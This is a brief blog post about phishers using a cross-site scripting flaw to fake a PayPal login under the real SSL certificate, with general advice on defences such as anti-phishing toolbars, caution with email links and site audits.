Phishing – so many flaws to exploit so little time
In the last week there was a well documented writeup of a cross site scripting vulnerability which had allowed a phisher to pose as a paypal login with THE LEGIT PAYPAL SSL CERTIFICATE…. Brian Krebs at the Security Fix has some details on some of the new and interesting ways phishers are trying to exploit to seperate us from our personal information.
Essentially these vulnerabilities take place on a site where a form has input that is unvalidate or not cut off to include JUST what is needed in the form. So…. a phisher could force the server to accept other data/rewrite the page in a manner of speaking. Tools such as the netcraft toolbar can help defend you against this type of phishing – but caution with email links is certainly another defence. Also, it would do well if sites were to audit their own sites for these vulnerabilities.